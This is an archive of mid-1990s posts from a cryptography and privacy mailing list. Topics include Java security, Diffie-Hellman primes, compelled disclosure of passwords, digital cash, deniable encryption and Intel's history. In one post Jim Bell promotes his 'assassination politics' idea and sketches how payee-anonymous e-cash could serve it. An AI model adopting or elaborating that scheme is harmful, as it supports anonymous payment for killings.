But it's not appropriate for this list.  And this is a Canadian matter.

> I'm just sorry that our Prime Minister is in such a bad position because 
> of the timing of this "Jane Shorten's" revelations.  She also revealed 
> that Canada spied on Japan.
> 
> To think ... Canadian Prime Minister Chretien is a guest of the Japanese
> people today.  Talk about some awkward moments.  I mean, what on earth do
> you talk about?? 
> 
> George Bush and Sushi??

Cute ... really.  I'm certainly amused.  As I'm certain were all the 
Americans on this International list.  George Bush, simply had jet lag, 
when he threw up at Japan.  What does he have to do with anything?

Canada and Japan have a great deal to speak about.  Canada might even be a
good friend and help the US with the Okinawa problem.  Who knows?  We
never know how these things play. 

I really don't think that Canada will be marginalized by this, and I 
certainly hope that neither will I.  Your antics, notwithstanding, and 
your imagination of "tying things together" serves no purpose.

The people on this list can filter fact from fiction.

> Alice de 'nonymous ...
> 
>                                   ...just another one of those...
>                                                    ...hunters...
> 
> P.S.  This post is in the public domain.
>                   C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

Like, I said ... very, very cute.

There's only one problem, mr mystery-writer, I only have one or two
interests on this list.  And politics is not generally one of them.  My
interests are simply and in order of personal importance, 

     - removing known Security Holes in existing software or removing the
       software, (e.g.  Netscape Navigator and Java), and

     - finding some secure way to implement functional international
       commerce via the Internet. Probably, something ECU based. 

Security and E-cash. 

Your attempt to create some type of political "brownie points" or desire
to gain some attention or notoriety simply destracts me from addressing
the real issues, and addressing my backed-up email. 

MALICE DE MONSTEROUS wasn't enough for you??  

Please don't bother with any reply.  None is expected.



Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From wb8foz at nrk.com  Fri Nov 17 05:04:51 1995
From: wb8foz at nrk.com (David Lesher)
Date: Fri, 17 Nov 1995 21:04:51 +0800
Subject: Electronic Records in NYS
Message-ID: <199511171239.HAA17717@nrk.com>



>From another list:
Forwarded message:
Date:         Thu, 16 Nov 1995 09:52:50 -0500
Sender: Computer-assisted Reporting & Research <CARR-L%ULKYVM.BITNET at uga.cc.uga.edu>
From: Ann Marie Przybyla <APRZYBYL at MAIL.NYSED.GOV>
Subject:      Electronic Records User Survey
X-To:         CARR-L at ulkyvm.Louisville.edu
To: Multiple recipients of list CARR-L <CARR-L%ULKYVM.BITNET at uga.cc.uga.edu>

This message is being posted to several lists; please excuse any
duplication

****************************************************************

Colleagues:

The New York State Archives and Records Administration (SARA) has
acquired four significant electronic data sets generated by New
York State agencies, including the Department of Education and
the Department of Correctional Services.  To enhance access to
the data sets, SARA is conducting a survey targeted at
researchers who use machine-readable data and statistical
analysis for their work.

A high level of participation in this survey would be very
helpful. If you would like to participate, please contact:

Ann Marie Przybyla
Electronic Records and Networking Services Unit
New York State Archives and Records Administration
aprzybyl at mail.nysed.gov


-- 
A host is a host from coast to coast.................wb8foz at nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433





From habs at warwick.com  Fri Nov 17 05:59:29 1995
From: habs at warwick.com (Harry S. Hawk)
Date: Fri, 17 Nov 1995 21:59:29 +0800
Subject: Java & Netscape security (reply to misc. postings)
In-Reply-To: <199511170439.UAA19926@netcom17.netcom.com>
Message-ID: <199511171345.IAA19681@cmyk.warwick.com>



> 
> After reading http://java.sun.com/1.0alpha3/doc/security/security.html my
> (possibly faulty) understanding of Java security is that it will not allow
> an applet to speak to IP addresses other than the one it was loaded from. 
> I have a question:

FYI.

According to an interview I did with Sun. Inter applet communcation, btw,
can only occur between applets from the same IP address, same domain name
and on the same page...

/hawk





From asb at nexor.co.uk  Fri Nov 17 06:49:52 1995
From: asb at nexor.co.uk (Andy Brown)
Date: Fri, 17 Nov 1995 22:49:52 +0800
Subject: 4096 bit strong prime for Diffle-Hellman
In-Reply-To: <Pine.SOL.3.91.951114090156.23102A-100000@orb>
Message-ID: <Pine.SOL.3.91.951116091316.19868C-100000@eagle.nexor.co.uk>


On Tue, 14 Nov 1995, Eric Young wrote:

> Just for anyone interested, I 'found' a suspected 4096 strong prime (p and
> (p-1)/2 are prime) for use with Diffie-Hellman, generator of 2.

As a matter of interest, how long did it take you to generate this, and
with what hardware?  I left a 120Mhz Pentium searching for 15 hours
overnight without any success (it managed to eliminate 10 candidate primes
as not strong in that time). 


Regards,

- Andy

-----------------------------------------------------------------------
 Andrew Brown  Internet <asb at nexor.co.uk>  Telephone +44 115 952 0585
 PGP (2048/9611055D): 69 AA EF 72 80 7A 63 3A  C0 1F 9F 66 64 02 4C 88
 All views expressed here are my own and not those of my employer






From jya at pipeline.com  Fri Nov 17 07:53:13 1995
From: jya at pipeline.com (John Young)
Date: Fri, 17 Nov 1995 23:53:13 +0800
Subject: Cornell Cracks Down on Private E-MAIL...
Message-ID: <199511171522.KAA11733@pipe4.nyc.pipeline.com>



Responding to msg by pcw at access.digex.net (Peter Wayner) on 
Fri, 17 Nov  9:47 AM

----------

   The New York Times, November 17, 1995, p. B8. 


   Penalties Decided in E-Mail at Cornell

   Cornell University has reached agreement with four students
   on punishment for a widely distributed E-mail message they
   wrote listing "75 reasons why women should not have freedom
   of speech." The university rejected harsh penalties like
   suspension because the students did not engage in sexual
   harassment, university officials said yesterday.

   The university had investigated complaints of sexual
   harassment and misuse of computer resources after the
   message made its way on the Internet last month, angering
   thousands of computer users who sent angry responses to the
   four students. The message included the lines, "If she
   can't speak, she can't cry rape" and, "Of course, if she
   can't speak, she can't say no."

   The university said the students had agreed to attend a
   program dealing with date and acquaintance rape, and would
   perform 50 hours of community service.

   -----

   There was a somewhat longer NYT article a day or two ago;
   anybody want it, send your PIN_kie.













From smithmi at dev.prodigy.com  Fri Nov 17 08:10:48 1995
From: smithmi at dev.prodigy.com (Michael Smith)
Date: Sat, 18 Nov 1995 00:10:48 +0800
Subject: COE Recommendation No. R (95) 13
Message-ID: <199511171546.KAA17869@tinman.dev.prodigy.com>



>>9. Subject to legal privileges or protection, most legal systems permit
>>investigating authorities to order persons to hand over objects under
>>their control that are required to serve as evidence. In a parallel
>>fashion, provisions should be made for the power to order persons to
>>submit any specified data under their control in a computer system in the
>>form required by the investigating authority.
>>________________________________________________________________________
>
>>Is this 'what we would want'? It clearly means that one can be ordered
>>to reveal the password to encrypted data and punished by law if one
>>refuses.

Forgive me if this point has already been raised, but couldn't an 
objection to such laws be based on the protection against 
self-incrimination? 

Maybe this all depends on whether the legal context is a civil or a 
criminal proceeding. If I'm being sued and they ask me at a deposition
whether I did such-and-such, I can't take the Fifth (or can I?). But 
if I'm accused of murder, the police can't make me tell them where I've 
buried the knife. However, if I have a wall safe and they 
get a warrant to search it, can I be jailed for contempt if I don't 
give them the combination? 

This seems to be a case where existing legal paradigms ought to 
extend rather naturally. Whether the existing paradigms are any 
good or not is of course a separate question. 

--Michael Smith
  smithmi at dev.prodigy.com

 






From walrus at ans.net  Fri Nov 17 08:45:25 1995
From: walrus at ans.net (michael shiplett)
Date: Sat, 18 Nov 1995 00:45:25 +0800
Subject: SA: Confidential Communication on the Internet
In-Reply-To: <Pine.SUN.3.90.951117010848.21461A@dfw.net>
Message-ID: <199511171627.LAA17236@fuseki.aa.ans.net>


"ao" == Aleph One <aleph1 at dfw.net> writes:

ao> On the December issue of Scientific American there is an article
ao> by Thomas Beth, "Confidential Communication on the Internet".
ao> Lite on the technical side but good reading anyway.

  This seemed to be a duplication of an X.509 certificate hierarchy:
``Hey, I don't know who you are but you have a seals which go back to
a CA I trust.'' In this respect the information seemed unworthy of an
article in SA.

Perhaps I did not read the article closely enough?

michael





From Piete.Brooks at cl.cam.ac.uk  Fri Nov 17 09:45:50 1995
From: Piete.Brooks at cl.cam.ac.uk (Piete Brooks)
Date: Sat, 18 Nov 1995 01:45:50 +0800
Subject: Mbone seminar 21st Nov 16:15UTC: FIREWALLS AS A NETWORK SECURITY TOOL
Message-ID: <"swan.cl.cam.:178540:951117141816"@cl.cam.ac.uk>


Executive summary
=================

Any non UK site interested in seeing an MBone transmitted seminar on 21st 
November at 16:15 UTC entitled "FIREWALLS AS A NETWORK SECURITY TOOL" should 
contact me to get the IP address and TTL changed.


Plug, caveat, etc
=================

To enable "lone" security reseachers (i.e. not enough people in the dept to 
have regular Security Seminars) in the UK to "keep in touch", we transmit our 
departmental Security Seminars on the MBone each week, with a low TTL and 
administratively scoped to the UK (so we don't have to worry about clashing 
with other events. The AC.UK MBone is fully pruning, and typically has spare 
bandwidth).
These are not big formal events, but typically have a dozen or two members of 
the department and other "locals" present.
The termly program is available on the Web in http://www.cl.cam.ac.uk/Seminars
under "Security seminars" [ That way you can see our more formal "Departmental 
Seminars" listing at the same time :-) ]
It's run as a "DIY" service (i.e. members of the group set things up) so 
things may go amiss. However, if they do (or there are time zone problems) it 
is fairly simple to retransmit later (during UK office'ish hours -- unless 
someone has some magic to start up vat and vic or nv without using X) from the 
tape we make ...


Full details
============

As Firewalls are of interest to both these lists (sorry for cross posting!) I 
thought I might take this oportunity to draw your attention to this particular 
seminar. See http://www.cl.cam.ac.uk:80/Seminars/mbone.html for the latest 
info (e.g. slides will appear when I get them), but here is the announcement 
(roughly) as I received it:

                       ***   ***   ***   ***   ***

                  University of Cambridge Computer Laboratory

                            SECURITY SEMINAR SERIES

SPEAKER:	Alec Muffett, Sun Microsystems
DATE:		Tuesday 21st November at 4.15pm
PLACE:		Room TP4, Computer Laboratory
TITLE:		FIREWALLS AS A NETWORK SECURITY TOOL

The "Firewall" - taking the (quite broad) definition of a firewall's
being any device designed (in some manner) to restrict "soft" access
to a network - has migrated from being a tool of the paranoid systems
administrator, into being a standard part of modern network
infrastructures.

This seminar will review why this situation has come about, what
modern firewall architectures (both basic and advanced) look like,
examine what they can/cannot accomplish, and will speculate upon the
future potential of firewalls as access-security devices.


                         ***   ***   ***   ***   ***

As noted above, by default these are normally restricted to UK MBone sites,
so let me know in advance (the M/C IP address changes !) if it wanted further 
afield.






From tcmay at got.net  Fri Nov 17 09:57:27 1995
From: tcmay at got.net (Timothy C. May)
Date: Sat, 18 Nov 1995 01:57:27 +0800
Subject: Corrections about Bob Noyce and Intel
Message-ID: <acd204fa000210047be5@[205.199.118.202]>


At 4:55 PM 11/17/95, attila wrote:

>   2.  most were pioneers: a specific example is Bob Norris who walked
>       out of a Fairchild board meeting being being rejected for his
>       eighth try at replacing Germanium because the first seven had
>       failed. A couple of VCs, among them Arthur Rock and Bob Perring
>       said: "...we believe you, let's try silicon..." and we have Intel.

Bob Noyce was already making silicon devices at Fairchild. The "planar
process" was developed by him in the late 50s. It is not the case that
Fairchild was stuck making germanium, nor that Intel was the first to use
silicon. I could go on about the actual history, but this is far from the
themes of this list, and many books cover the history very well.

What Intel pioneered the development of was _silicon-gate MOS_, where the
aluminum gates of traditional silicon devices is replaced with polysilicon
gates. Intel did this by hiring the silicon-gate gurus from Fairchild
(Vadasz, Grove, Faggin, etc.).

>       But, who drives Intel today? --Grove, who is labelled as the
>       founder.  Grove made the _business_ -the brains have been
>       forgotten. Norris was the darling of the VCs for a couple years
>       until they figured he couldn't spot a _financial_ success.

Grove remains a technologist--I studied semiconcuctor physics from his
wonderful 1967 book, "The Physics and Technology of Seminconductor
Devices"--and the group that leads Intel is highly technical. Gordon Moore
remains connected, materials scientist Craig Barrett (who hired me into
Intel in '74, ironically) is next-in-line to be President, Gerry Parker is
a top technologist, and so on.

As to Bob Noyce being the "darling of the VCs for a couple of years until
they figured he couldn't spot a _financial_ success," I should just let
that one pass. Noyce of course has been dead for several years. When he was
alive, though, he "spotted" several financial successes.

--Tim May


Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From hallam at w3.org  Fri Nov 17 10:23:12 1995
From: hallam at w3.org (hallam at w3.org)
Date: Sat, 18 Nov 1995 02:23:12 +0800
Subject: COE Recommendation No. R (95) 13
In-Reply-To: <199511171546.KAA17869@tinman.dev.prodigy.com>
Message-ID: <9511171800.AA07897@zorch.w3.org>



>Forgive me if this point has already been raised, but couldn't an 
>objection to such laws be based on the protection against 
>self-incrimination? 

There is no such right in most (if not all) european countries. In
France there is not even the presumption of innocence.

The British Conservatives have recently passed a criminal justice
Bill which abolishes the right to silence and most other protections
for the defendant. They are busy writing another.

That is not to say US politicians are any better. Congress is busily 
rolling back on all the protections they can. Got to fill those jails
somehow you know.

	Phill







From grdawe at toad.com  Fri Nov 17 10:42:52 1995
From: grdawe at toad.com (grdawe at toad.com)
Date: Sat, 18 Nov 1995 02:42:52 +0800
Subject: nnets & crypto
Message-ID: <Chameleon.951117113552.gweissma@altonet.com>




IMHO etc., *any* time there is an application involving pattern-matching and analysis of complex in->out 
relations/functions there is a possible application of NN's.  That's not to say that a particular application 
would be a panacea, but designed properly I think an NN could be of value in differential crypto, discovering 
crypto-weak (i.e. strong) correlations between in->out, etc.  My intuition says there is or can be value as a 
tool for the cryptanalyst.

I would also not discount the use of NN's in ENcrypting, given the capability of NN's realizing (almost) any 
arbitrary, nonlinear function from in->out. 

Caveat: practical considerations not accounted for in these opinions. 



>Date: Fri, 10 Nov 1995 11:52:41 -0800
>From: Bill Stewart <stewarts at ix.netcom.com>
>Subject: Re: coding and nnet's

>Schneier's 2nd edition says "Neural nets aren't terribly useful for
>cryptography, primarily because of the shape of the solution space.

>Neural nets work best for problems that have a continuity of
>solutions, some better than others. This allows a neural net to
>learn, proposing better and better solutions as it does. Breaking an
>algorithm provides for very little in the way of learning
>opportunities: You either recover the key or you don't. (At least
>this is true if the algorithm is any good.)

Has anyone tried using neural nets or similar techniques for
searching for useful nonrandom properties of the round functions of
block ciphers or hash functions?  This might be useful in trying to
prepare some new kind of attack, find a balanced binary function
that is useful in using the generalization of linear cryptanalysis
discussed by Harpes, Kramer, and Massey at Eurocrypt '95, find a
better "difference" function for use in a differential attack, etc.

>Neural nets work well
>in structured environments when there is something to learn, but not
>in the high-entropy, seemingly random world of cryptography." And he
>doesn't give any references.

Merkle's paper on Khufu and Khafre addresses this idea, I think.
Merkle comments that it's not going to be useful against a full
cipher, but that it might be useful against (say) Khufu with one or
two octets.

>#				Thanks;  Bill
># Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
># Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey at delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKhv1UHx57Ag8goBAQE5IAQAtV3GTqZO08WwHDJSI3Dj2NgIu7rQPrUH
V5vBCWTCvRsVNt07K8FbKMxPhF+QmXINPlOEMn4qZbhph0oyf/zAj3uV+6yzO3Eg
FMXrZzc1zOOdcfp9IcMvoXvd/av9zq/jH6Sn6yZB3jTO42ENeSSLNbxtaBrzgABl
zPklYWOnDrw=
=x3kP
-----END PGP SIGNATURE-----








From dreschs at mpd.tandem.com  Fri Nov 17 10:43:00 1995
From: dreschs at mpd.tandem.com (Sten Drescher)
Date: Sat, 18 Nov 1995 02:43:00 +0800
Subject: COE Recommendation No. R (95) 13
In-Reply-To: <199511171546.KAA17869@tinman.dev.prodigy.com>
Message-ID: <199511171810.MAA09890@galil.austnsc.tandem.com>


smithmi at dev.prodigy.com (Michael Smith) said:

>>> 9. Subject to legal privileges or protection, most legal systems
>>> permit investigating authorities to order persons to hand over
>>> objects under their control that are required to serve as
>>> evidence. In a parallel fashion, provisions should be made for the
>>> power to order persons to submit any specified data under their
>>> control in a computer system in the form required by the
>>> investigating authority.
>>> ________________________________________________________________________
>> Is this 'what we would want'? It clearly means that one can be
>> ordered to reveal the password to encrypted data and punished by law
>> if one refuses.

MS> Forgive me if this point has already been raised, but couldn't an
MS> objection to such laws be based on the protection against
MS> self-incrimination?

MS> Maybe this all depends on whether the legal context is a civil or a
MS> criminal proceeding. If I'm being sued and they ask me at a
MS> deposition whether I did such-and-such, I can't take the Fifth (or
MS> can I?). But if I'm accused of murder, the police can't make me tell
MS> them where I've buried the knife. However, if I have a wall safe and
MS> they get a warrant to search it, can I be jailed for contempt if I
MS> don't give them the combination?

	Well, IANAL, but yes, I believe that you can be.  Or, worse,
obstruction of justice.  Especially if they cut it open and find that
the knife was in the safe.

-- 
#include <disclaimer.h>				/* Sten Drescher */
To get my PGP public key, send me email with your public key and
	Subject: PGP key exchange
Key fingerprint =  90 5F 1D FD A6 7C 84 5E  A9 D3 90 16 B2 44 C4 F3





From m5 at dev.tivoli.com  Fri Nov 17 10:46:33 1995
From: m5 at dev.tivoli.com (Mike McNally)
Date: Sat, 18 Nov 1995 02:46:33 +0800
Subject: Java & Netscape security  [NOISE]
In-Reply-To: <9511161831.ZM14572@glacius.alias.com>
Message-ID: <9511171814.AA23432@alpha>



Frederick B. Cohen writes:
 > This is baloney.  When you work for Netscape or Sun and speak about your
 > company's products, you are representing the company whether you
 > disclaim it or not.

Baloney.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5 at tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





From rjc at clark.net  Fri Nov 17 10:54:29 1995
From: rjc at clark.net (Ray Cromwell)
Date: Sat, 18 Nov 1995 02:54:29 +0800
Subject: Java & Netscape security  [NOISE]
In-Reply-To: <9511170006.AA17075@all.net>
Message-ID: <199511171827.NAA26980@clark.net>


> 	When Postscript allows writing to files, most Web browsers
> become insecure - including Netscape, including HotJava.  If the only
> commonly available postscript programs are insecure, the products have
> hooks designed to allow postscript to be used automatically to interpret
> programs from over the net, and servers commonly provide information in
> postscript format, the enabling technology (i.e., Netscape and Hot Java)
> is responsible for the vulnerability.

   [This is my last response on this subject.] This is a non-sequitur.
Providing hooks for third-party add ons does not make Netscape
responsible for damage done by third party products. If you believe
this is true, find me a legal precedent for it. It doesn't make sense
on a purely intellectual level. If you produces a product that has the
ability to be ugpraded, and someone upgrades it with dangerous
third party products, how can you control that? The only way to assure
against it is to not allow upgrades of functionality except by 
your own company. This throws the whole idea of reusable software,
device independence, and building "platforms" right out the window.
It's the kind of logic that seeks to make bars responsible for
drunk drivers. Indeed, Microsoft and Apple should be held responsible
for dangerous "applications" that their computers can execute.

   I don't know anyone who has a postscript viewer configured in Netscape
and I suspect the vast majority of people using Netscape don't even
have the knowledge to do it. Your comments are not significant and
the threat is minor. If you had actually exposed a threat to the
JavaVM/Classloader model, which might be installed on a sizable
portion of browser machines, you might have a point. But since
your postingas have made it clear that you haven't read or understood
the Java papers (besides the white paper), nor have you looked at
the actual implementation, your comments are essentially meaningless.
You seem fixated on what is, a semantic argument about what "safe"
or "secure" means.  (e.g. your comments on MD5)  You expect these
words to have a binary meaning. Either something is safe/secure or it isn't.

The world is a lot more fuzzy than that.

-Ray










From jimbell at pacifier.com  Fri Nov 17 11:09:56 1995
From: jimbell at pacifier.com (jim bell)
Date: Sat, 18 Nov 1995 03:09:56 +0800
Subject: e$: Come aaaannnndddd Get it!
Message-ID: <m0tGVUJ-0008xnC@pacifier.com>


>> 	I will as soon as someone comes up with a _fully_ private digital
>> cash system and starts using it for something. As I understand it, Chaum's
>> ecash system is not one (i.e., non-privacy to the sender and of amounts
to the
>> bank). If I'm incorrect, please tell me and I'll set up an account with MTB
>> immediately (if there's a text-based interface).
>
>	ecash provides full payor anonymity. Payee anonymity is
>currently not possible, but that is being worked on. 
>
>	If you used ecash to pay for a c2.org account, neither I nor
>the bank would be able to trace the payment into the c2.org account to
>an actual account at mark twain bank.
>sameer						Voice:   510-601-9777
>Community ConneXion				FAX:     510-601-9734

If you've been following my idea, "assassination politics," you know that
there is an excellent use for payee-anonymous digital cash.  

It seems to me that this should be possible, within limits, if the potential
payee could generate a "blinded" note to be delivered to the payer by
anonymous means.  The payer could get the note certified by the bank,
possibly given an extra "blind" if necessary  (is this possible? Desirable?
Why not?) and then the resulting still-blinded but certified note is posted
(in encrypted form, I supposed) to the 'net so that only the payee can
decrypt and unblind it.






From frantz at netcom.com  Fri Nov 17 11:34:04 1995
From: frantz at netcom.com (Bill Frantz)
Date: Sat, 18 Nov 1995 03:34:04 +0800
Subject: credit card conventional wisdom
Message-ID: <199511171905.LAA27110@netcom4.netcom.com>


At 15:22 11/16/95 -0500, Arley Carter wrote:
>3.  I'm getting tired of seeing posts this list about what is more dangerous
>cyberspace or restaurantspace.  Let's focus on the real mechanics of how
>the ground rules of credit card clearing will operate in cyberspace. The
>credit card consortiums can advance the cause of electronic commerce by
>stating in unambigous terms what their views are of these ground rules.
>Developers, cardholders and merchants can then make a judgement on whether
>those risks are acceptable to each party respectively.  

I agree.  I doubt we can completely eliminate the risk by technical fixes. 
I do think we may be able to reduce the risk below what it is in
non-cyberspace commerce.  (e.g. phone orders and in-person card
presentation).  If we can do that, and a significant part of commerce moves
to cyberspace, then we can see a reduction in the fraud premium that we all
pay (no matter who "offically" pays for it).

While cash-like instruments will be an important part of cyberspace, I
think that credit arangements may be more important.  In non-cyberspace
commerce, almost all big-ticket purchases are made with time-payment
credit.  Whether the total of the "candy bar" transactions will exceed the
total to the big-ticket transactions, I don't know.  Certainly if we are
dealing with tangable goods, shipping costs encourage large orders.

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz at netcom.com             Los Gatos, CA 95032, USA







From smithmi at dev.prodigy.com  Fri Nov 17 12:21:49 1995
From: smithmi at dev.prodigy.com (Michael Smith)
Date: Sat, 18 Nov 1995 04:21:49 +0800
Subject: COE Recommendation No. R (95) 13
Message-ID: <199511171958.OAA30121@tinman.dev.prodigy.com>


>
>>Forgive me if this point has already been raised, but couldn't an 
>>objection to such laws be based on the protection against 
>>self-incrimination? 
>
>There is no such right in most (if not all) european countries. In
>France there is not even the presumption of innocence.

[Further depressing news deleted]

Yes, this was my understanding. I guess the point I was groping 
toward was that while  we could hardly expect that our rights vis-a-vis
electronic privacy would be any _better_ than our rights in 
obviously analogous non-electronic areas, they might well be worse;
it's important to be clear, and to make clear, that what rights 
we have left have obvious extensions to our net.activities, and 
try to prevent the thin end of the wedge from being inserted in 
our portion of the perimeter.

Of course, this only applies to the set of people who live in 
countries where people _have_ any rights, and as Phill implies, 
that may soon be the null set.   

--Michael Smith
  smithmi at dev.prodigy.com

 






From perry at piermont.com  Fri Nov 17 12:59:47 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sat, 18 Nov 1995 04:59:47 +0800
Subject: No Privacy Right in UK ?
In-Reply-To: <Pine.BSD.3.91.951117025209.5772G-100000@ahcbsd1.ovnet.com>
Message-ID: <199511172025.PAA13462@jekyll.piermont.com>



Could you please explain what this has to do with cryptography?

"James M. Cobb" writes:
>  
> 11 16 95 The Electronic Telegraph runs a newsstory headed 
>  
>    Doorstep polish researcher was whiplash injuries spy 
>  





From smithmi at dev.prodigy.com  Fri Nov 17 13:06:49 1995
From: smithmi at dev.prodigy.com (Michael Smith)
Date: Sat, 18 Nov 1995 05:06:49 +0800
Subject: COE Recommendation No. R (95) 13
Message-ID: <199511172019.PAA30181@tinman.dev.prodigy.com>


>MS> However, if I have a wall safe and
>MS> they get a warrant to search it, can I be jailed for contempt if I
>MS> don't give them the combination?
>
>	Well, IANAL, but yes, I believe that you can be.  Or, worse,
>obstruction of justice.  Especially if they cut it open and find that
>the knife was in the safe.

So presumably the same would apply to the password that unlocks my 
PGP private key. But there's an interesting twist. Once they open 
up the wall safe, they can see for sure what is and isn't in it. This 
ain't necessarily so for an encrypted file. Suppose my software has the 
fiendish sophistication to disgorge different keys depending on what 
password was given, and different pieces of cleartext depending 
on what key was used. (Again, I apologize if this notion has already 
been extensively discussed.) Is there a way to set it up such that 
the cops couldn't be sure -- even using a logic analyzer -- that I 
hadn't given them the complete set of keys, so as to read all the 
cleartexts in the file? Assume that cyphertext files are guaranteed 
to be larger, by some random factor, than the sum of all the cleartexts 
in them, so the mere fact that a smaller quantity of cleartext was 
disgorged than cyphertext supplied would tell them nothing. I guess this 
is a kind of steganography, isn't it? Or at least something similar -- 
the point would be that they couldn't tell genuine cyphertext from 
camouflaging noise, without the key that tells them where to look. 

Which brings us, in turn, to the bottom line: the only things we 
can be certain the bad guys _won't_ do, are the things they _can't_
do. 
 

--Michael Smith
  smithmi at dev.prodigy.com

 






From attila at primenet.com  Fri Nov 17 13:13:07 1995
From: attila at primenet.com (attila)
Date: Sat, 18 Nov 1995 05:13:07 +0800
Subject: Corrections about Bob Noyce and Intel
In-Reply-To: <acd204fa000210047be5@[205.199.118.202]>
Message-ID: <Pine.BSD.3.91.951117192114.9415R-100000@usr5.primenet.com>


On Fri, 17 Nov 1995, Timothy C. May wrote:

> At 4:55 PM 11/17/95, attila wrote:
> 
> >   2.  most were pioneers: a specific example is Bob Norris who walked
> >       out of a Fairchild board meeting being being rejected for his
> >       eighth try at replacing Germanium because the first seven had
> >       failed. A couple of VCs, among them Arthur Rock and Bob Perring
> >       said: "...we believe you, let's try silicon..." and we have Intel.
> 
	a sign of getting old: blowing names. yes, it is Noyce.

> Bob Noyce was already making silicon devices at Fairchild. The "planar
> process" was developed by him in the late 50s. It is not the case that
> Fairchild was stuck making germanium, nor that Intel was the first to use
> silicon. I could go on about the actual history, but this is far from the
> themes of this list, and many books cover the history very well.
> 
> What Intel pioneered the development of was _silicon-gate MOS_, where the
> aluminum gates of traditional silicon devices is replaced with polysilicon
> gates. Intel did this by hiring the silicon-gate gurus from Fairchild
> (Vadasz, Grove, Faggin, etc.).
>
    you are probably correct, I did not follow the actual technology. I
    do know that from the financial point of view, there had been too many
    failures to justify another large project --yes, that could have been
    the silicon-gate MOS theory.  But there certainly was a parting of the
    ways over funding, to the probable good of the industry since
    Fairchild was already very stodgy. You do need a new, ambitious 
    venture to exploit a new technology --one with a single goal, and
    Intel certainly was that vehicle. 

    The closest I got to Fairchild Semiconductor was when I was consulting
    as a hatchet man to "save" another, newly acquired, Fairchild division
    which had a desparate need for 100K ECL parts which were not really 
    on the market in 1977.  The labs in the old building 2 were in pitiful 
    shape, and that is where 100K ECL had been ostracized --the new
    division's product was hot on the list of then current Fairchild
    president, Cronin, who suffered through my presenation of why I 
    needed $1M plus the 100K lab and fab upgraded --funding for both was
    the same day, not the usual 3-6 months.  Nice corporate jet at the
    time.... :)  and, yes, both projects were _very_ successful.
 
> >       But, who drives Intel today? --Grove, who is labelled as the
> >       founder.  Grove made the _business_ -the brains have been
> >       forgotten. Norris was the darling of the VCs for a couple years
> >       until they figured he couldn't spot a _financial_ success.
> 
> Grove remains a technologist--I studied semiconcuctor physics from his
> wonderful 1967 book, "The Physics and Technology of Seminconductor
> Devices"--and the group that leads Intel is highly technical. Gordon Moore
> remains connected, materials scientist Craig Barrett (who hired me into
> Intel in '74, ironically) is next-in-line to be President, Gerry Parker is
> a top technologist, and so on.
>
    Grove _was_ a technologist, but his current competitive tactics may 
    have been the tutor for Bill Gates  --or is the other way around? :)
    since Bill is the most effective and feared, even by government, of
    competition by terror tactics ever seen --beats even Cornelius
    Vanderbilt who tried to contain Edison so his gas businesses would not
    suffer --CB _financed_ Edison and then tried to block Edison --who
    then essentially gave NYC the downtown power station, building it in 
    defiance of CB.

    But, even if Edison was the inventor, he was not a visionary: he had
    Tesla, who already had an AC motor, in his employ in the 1880s; they
    parted as Edison would not budge off DC and Tesla sold his AC 
    Techology to George Westinghouse who had a great deal of money from
    his air brakes.  When Tesla received the Niagra Fall power generator
    contract, DC was history and the huge generators Tesla designed are
    still running at the base of the falls --90+ years! 

    The same analysis can be applied to to Bob Noyce v. Andrew Grove 
    --Andrew Grove may have been an engineer, but he also became a 
    visionary, as did Bill Gates.

    I have not seen, or had the pleasure of seeing, Gordon Moore for at 
    least 10 years. Yes, he is a technologist; AND, he is a gentleman. 

    I do not know Craig Barrett.  A Barrett presidency may change Intel's
    voracious competitiveness, or it may not.  

> As to Bob Noyce being the "darling of the VCs for a couple of years until
> they figured he couldn't spot a _financial_ success," I should just let
> that one pass. Noyce of course has been dead for several years. When he was
> alive, though, he "spotted" several financial successes.
>
    your history is generally better than mine, Tim, but I will differ on 
    that point. in the 70s and 80s I was consulting to 3-7 of the heavy 
    players at that time in the Sandhill group plus the old guard 
    downtown on high-tech ventures --I always figured I would get the call
    when their fear exceeded their greed.  :) (and so stated by one of
    their own). 

    you may be correct that Bob Noyce hit a couple of winners, but, 
    overall he did just the opposite. as two of the heavies stated over
    lunch one day, "...having Bob Noyce's recommendation became the kiss 
    of death in this town..."  

    Now, granted, the VCs have their own point of view of what a 
    financial success is --after all, they base their views on an
    investment strategy for 10 deals:  1 real winner (not necessarily a 
    NetScape or an Intel, but at least go public with a bang), 3 make
    decent profit, 3 investment returned (or most of it), and 3 dead, or
    close to dead, losses. 

    My objection to the VC financing strategy was that they also took
    personal notes from the startup team and selectively enforced them,
    usually on the pioneers and not the president and comptroller they
    installed as part of the deal; and they have been known to take 
    homes.... 
    
    Today's VC is a far cry from John D. Rockefeller who was vilified in
    his day for his business practices --John D. took 10%, not 51% or more
    plus personal notes. 

    BTW, John D. was the first "big" anti-trust case in the U.S. Ohio 
